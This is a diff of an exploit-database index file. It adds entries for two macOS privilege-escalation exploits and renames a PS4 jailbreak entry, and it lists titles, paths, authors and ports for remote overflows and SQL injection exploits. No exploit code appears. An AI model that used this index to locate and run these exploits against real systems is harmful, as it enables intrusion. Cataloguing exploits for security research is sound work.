+44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
+44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16281,7 +16287,7 @@ id,file,description,date,author,type,platform,port
 44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
 44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
-44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware,
+44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware,
 44226,exploits/php/remote/44226.txt,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution",2018-03-02,"Manish Tanwar",remote,php,
 44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
 44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,